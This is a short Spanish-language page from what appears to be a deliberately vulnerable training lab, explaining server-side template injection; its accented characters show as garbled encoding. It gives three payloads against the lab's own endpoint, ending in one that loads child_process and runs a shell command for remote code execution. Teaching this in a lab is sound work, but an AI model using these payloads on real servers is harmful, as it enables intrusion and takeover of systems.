CRITICAL
Server-Side Template Injection (SSTI)
Ejecuci贸n de c贸digo a trav茅s de plantillas del servidor mediante inyecci贸n de expresiones
Ejemplos de explotaci贸n:
Expresi贸n matem谩tica b谩sica
Prueba si el motor de plantillas eval煤a expresiones
/api/lab/ssti?template={{7*7}}Acceso a objetos globales
Intento de acceder a objetos del sistema
/api/lab/ssti?template={{constructor.constructor('return process')()}}Ejecuci贸n de c贸digo
Payload avanzado para RCE
/api/lab/ssti?template={{this.process.mainModule.require('child_process').exec('whoami')}}Vulnerabilidad Cr铆tica
Este endpoint renderiza plantillas con entrada del usuario sin sanitizaci贸n. Un atacante puede inyectar expresiones de template para ejecutar c贸digo arbitrario en el servidor, acceder a objetos del sistema, o leer archivos sensibles.
Esta aplicaci贸n es vulnerable por dise帽o - Solo para prop贸sitos educativos
漏 2025 Aitana Security Lab